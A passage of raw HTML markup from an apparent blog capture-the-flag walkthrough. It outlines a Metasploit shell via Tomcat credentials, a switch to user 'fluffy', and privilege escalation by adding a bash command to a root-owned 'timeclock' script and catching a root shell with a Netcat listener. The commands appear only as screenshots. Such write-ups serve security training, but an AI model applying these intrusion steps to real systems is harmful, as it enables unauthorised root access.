src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9PLpWHHUyCxbMq5bmTOO_ZcFBowKA6acE15dU0LEEo4Hjns1izY_gTvYbo0xKtvFxhvQErkfzAfkkJkps9xUqgrjwVTq6-Q6LkGMOI-MEPwSW8NIuCSOU5uM73qiquEfboUM7SbNNXFRU/s16000/screenshot.38.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Metasploit helps to get a shell using these Tomcat credentials:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFqI42_tXKVRHut4TWeCSVJg3uBz4yUNnDo5LgVmall77nob6ywzfB_aI9PanvIRA9E8VUey_Ewa6Ze9tMfT5vpOW56qshxKVIvgV5THQOfLUR1u0M_BGohLV7EtBI2T0_-rkcjvUHrMlp/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;490&quot; data-original-width=&quot;980&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFqI42_tXKVRHut4TWeCSVJg3uBz4yUNnDo5LgVmall77nob6ywzfB_aI9PanvIRA9E8VUey_Ewa6Ze9tMfT5vpOW56qshxKVIvgV5THQOfLUR1u0M_BGohLV7EtBI2T0_-rkcjvUHrMlp/s16000/screenshot.39.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Improving the shell:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWEvX_0ZaOrSRjkRzMuKgD-kyvgKuxvWGggQVUByEPM_jHREW5NMzIhzmmr31D1Fd-ChVpLVBUoHqQ0r87V5_guQ5M48IqImHYh3usv-9l9ucYX8-5xCEdUPhWDQqj1M94OmkT3lmcALG4/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;140&quot; data-original-width=&quot;519&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWEvX_0ZaOrSRjkRzMuKgD-kyvgKuxvWGggQVUByEPM_jHREW5NMzIhzmmr31D1Fd-ChVpLVBUoHqQ0r87V5_guQ5M48IqImHYh3usv-9l9ucYX8-5xCEdUPhWDQqj1M94OmkT3lmcALG4/s16000/screenshot.40.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Trying to switch to the first user is unsuccessful:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUsPNuJffASB_Ug7QFESPSoRxsSuUkDxqLeKyrTFBW0c8ZmWNpcbp_sBu4UyDCfsHPSQ4DW0i9TqcvwkbotsjJ92F1HupslEoTS5osTaa9i03pNClg4Ds91BGi0Iq3AH8EcSrD89EKkJcA/&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;120&quot; data-original-width=&quot;680&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUsPNuJffASB_Ug7QFESPSoRxsSuUkDxqLeKyrTFBW0c8ZmWNpcbp_sBu4UyDCfsHPSQ4DW0i9TqcvwkbotsjJ92F1HupslEoTS5osTaa9i03pNClg4Ds91BGi0Iq3AH8EcSrD89EKkJcA/s16000/screenshot.41.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- However we can switch to user &lt;b&gt;fluffy&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgecZg2GjI17Ajzi2z_LPD7RcyT9-4cT4hT60YDoIE6kogs89zh3OPEDp92tKhCDE8ATNniqNv_gG306C3GDK5XqkHcfRvh5JfH6kDgQ-aAk85tZMObZeTOBTzMPDUk5Sn3syDMwjvCjA_w/&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;209&quot; data-original-width=&quot;605&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgecZg2GjI17Ajzi2z_LPD7RcyT9-4cT4hT60YDoIE6kogs89zh3OPEDp92tKhCDE8ATNniqNv_gG306C3GDK5XqkHcfRvh5JfH6kDgQ-aAk85tZMObZeTOBTzMPDUk5Sn3syDMwjvCjA_w/s16000/screenshot.42.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuOG5iv-1Yd7DbKJC4KgwK5RAgleAT8cr7Xk7CGWe1UglM-KYaGMIJAkj2d1_OhRWmNal93XDfrQKEi74uKw5GP0u596hZkEoM8zKIEJ2yQ4A-sEBDZaJSsDa1Fpc1vRhg5V6PJYCa-xHl/&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;76&quot; data-original-width=&quot;548&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuOG5iv-1Yd7DbKJC4KgwK5RAgleAT8cr7Xk7CGWe1UglM-KYaGMIJAkj2d1_OhRWmNal93XDfrQKEi74uKw5GP0u596hZkEoM8zKIEJ2yQ4A-sEBDZaJSsDa1Fpc1vRhg5V6PJYCa-xHl/s16000/screenshot.43.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;4 - PRIVILEGE ESCALATION&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Looking into the folder &lt;b&gt;.private&lt;/b&gt; there are some interesting files:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLH2BBzEp_7GDwtbmiAyovHjHksEbzfNCCzr64G8mxYR1F3BCSqPujlQEMCLlyGQoskmd_XVVCBW6wsz7OhqTHnZKZUiUA6tBbi6MWwRTD3iEfEtA8M4bdXBI2A-kfKQnbhw9uMwWII1Rz/&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;279&quot; data-original-width=&quot;635&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLH2BBzEp_7GDwtbmiAyovHjHksEbzfNCCzr64G8mxYR1F3BCSqPujlQEMCLlyGQoskmd_XVVCBW6wsz7OhqTHnZKZUiUA6tBbi6MWwRTD3iEfEtA8M4bdXBI2A-kfKQnbhw9uMwWII1Rz/s16000/screenshot.44.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading &lt;b&gt;.secrets&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEoJq0FIhpL1WywUAEDpsUb5i66_WzmlpIwydLbBBu5c2fuiDNJa3VrmOx39d3z4qXSJfljHi3El6QmOpI5m9zaJX2QWC_eNxI3ZoEa0m4qmrSe0cgr9uOeX-qVVeIpl_i2cMnuBgKoHnK/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;70&quot; data-original-width=&quot;510&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEoJq0FIhpL1WywUAEDpsUb5i66_WzmlpIwydLbBBu5c2fuiDNJa3VrmOx39d3z4qXSJfljHi3El6QmOpI5m9zaJX2QWC_eNxI3ZoEa0m4qmrSe0cgr9uOeX-qVVeIpl_i2cMnuBgKoHnK/s16000/screenshot.45.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- File &lt;b&gt;timeclock&lt;/b&gt; is owned by root, and it seems to be a script to read time hosted at web page &lt;b&gt;/time:&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYhMqzj7R2vwKvjJNeF6CITWPMTZ-Qv8QsMvafHbVD_4AGn_AfFX6iip6qer6oUjx2g9mMdor0mxPufXvHarGAryVJZuKk1jx1WVn4ACsUEyfuvunYf0Ie7ZOPHUmOSkdwvnWLvk6hLwUb/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;185&quot; data-original-width=&quot;795&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYhMqzj7R2vwKvjJNeF6CITWPMTZ-Qv8QsMvafHbVD_4AGn_AfFX6iip6qer6oUjx2g9mMdor0mxPufXvHarGAryVJZuKk1jx1WVn4ACsUEyfuvunYf0Ie7ZOPHUmOSkdwvnWLvk6hLwUb/s16000/screenshot.46.jpg&quot; /&gt;&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHPRDevQ1Lgd2sRlmje1ijfaBbSTxy1uG3oYHmO8WmZ3KTgDMmHXIPlny6uVvrIl06StfekG7NHpdGyBbcYr6Lfkqic_G2Tv-20Xk_lJRahmT7wcegqJQ6t0yPbfTZuVR59CpTLebFxWkL/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;158&quot; data-original-width=&quot;495&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHPRDevQ1Lgd2sRlmje1ijfaBbSTxy1uG3oYHmO8WmZ3KTgDMmHXIPlny6uVvrIl06StfekG7NHpdGyBbcYr6Lfkqic_G2Tv-20Xk_lJRahmT7wcegqJQ6t0yPbfTZuVR59CpTLebFxWkL/s16000/screenshot.47.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- So one idea to get a remote root shell could be to add a bash command to &lt;b&gt;timeclock&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgspWM628SSeluVhyphenhyphenHDWKFEudXuG4-4uXmTYOdwaMI6qx7LLs7HwOjSGP9gMBdRA5OlXztgINcs4UPfNzjnoneD7BbpmkTx62r-3opm8Fl-DwaI7H5KhmmkCDHziI-FFFFav0G8USgumOoD/&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;256&quot; data-original-width=&quot;1477&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgspWM628SSeluVhyphenhyphenHDWKFEudXuG4-4uXmTYOdwaMI6qx7LLs7HwOjSGP9gMBdRA5OlXztgINcs4UPfNzjnoneD7BbpmkTx62r-3opm8Fl-DwaI7H5KhmmkCDHziI-FFFFav0G8USgumOoD/s16000/screenshot.49.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Now, setting a Netcat listener at port 3333:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjE9hgBfY8QWpIZk4C107-w0QzYw86YglBoh4DFWIrzycxIiY9CVpxc9ieSQaxFMI643L7P9-16ro-pv722WCzxU7Ubm-j279rSI_RUlK7ESuRR-NtDjLo3NH7RyUUcxGQnXoQJGi41_gY2/&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;77&quot; data-original-width=&quot;313&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjE9hgBfY8QWpIZk4C107-w0QzYw86YglBoh4DFWIrzycxIiY9CVpxc9ieSQaxFMI643L7P9-16ro-pv722WCzxU7Ubm-j279rSI_RUlK7ESuRR-NtDjLo3NH7RyUUcxGQnXoQJGi41_gY2/s16000/screenshot.48.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- After &lt;b&gt;timeclock&lt;/b&gt; is run, we have a remote root shell:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVdBJBTBxNt2aCLhc79fXUJsBMcZzdzelNIy7dbSnZtgan0P1jXXYoTOFPqz8Vo_jHyPzDiZ4lzQ9A1GY5L_b1h6gV9ZLOfoSEeoT9uHCtxgAP95dhhXp-ZLyIGXEAbFqFdo9itjZpTv0a/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;167&quot; data-original-width=&quot;689&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVdBJBTBxNt2aCLhc79fXUJsBMcZzdzelNIy7dbSnZtgan0P1jXXYoTOFPqz8Vo_jHyPzDiZ4lzQ9A1GY5L_b1h6gV9ZLOfoSEeoT9uHCtxgAP95dhhXp-ZLyIGXEAbFqFdo9itjZpTv0a/s16000/screenshot.50.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;5 - CAPTURING THE FLAG&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading&lt;b&gt; proof.txt&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcEfayIPCtdqv2vhluCIArwBdDOajFXctNqWRhxCjTXHRitIlVkNx8_8eSLupNvdjNC2v5zKqCipemhGMJDlacXg-BjH1BQF0Svnne6-Rf5XLXOy6BrOvLDmpKPzn0j4f1d-NIjHQo-dLV/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;52&quot; data-original-width=&quot;439&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcEfayIPCtdqv2vhluCIArwBdDOajFXctNqWRhxCjTXHRitIlVkNx8_8eSLupNvdjNC2v5zKqCipemhGMJDlacXg-BjH1BQF0Svnne6-Rf5XLXOy6BrOvLDmpKPzn0j4f1d-NIjHQo-dLV/s16000/screenshot.51.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span 